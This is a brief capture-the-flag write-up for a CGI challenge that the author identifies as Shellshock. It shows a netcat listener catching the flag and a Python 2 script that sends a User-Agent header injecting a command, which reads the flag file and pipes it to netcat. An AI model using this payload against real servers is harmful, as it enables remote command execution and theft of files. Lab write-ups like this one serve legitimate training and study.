The only address provided is a CGI address, so a CVE can be suspected.
From the provided hint, "Toddler's Bottle", I was able to infer that it is shellshock.

h3x0r@ip-172-31-17-183:~$ nc -l -v -p 44444
Listening on [0.0.0.0] (family 0, port 44444)
Connection from [127.0.0.1] port 44444 [tcp/*] accepted (family 2, sport 35474)
1Ts_Sora_Shock
h3x0r@ip-172-31-17-183:~$

root@ip-172-31-17-183:~/*****# cat ./sheshe.py
#!/usr/bin/python
import urllib2

target = 'http://52.199.49.117/cgi-bin/sheshe.cgi'
UAgent = '() { :;};/bin/cat /home/sheshe/flag | /bin/nc localhost 44444'
#UAgent = 'abd'
req = urllib2.Request(target)
req.add_header("User-agent",UAgent)
try:
    urllib2.urlopen(req)
except:
    print "[+] Success"
root@ip-172-31-17-183:~/*****# ./sheshe.py
[+] Success
root@ip-172-31-17-183:~/*****#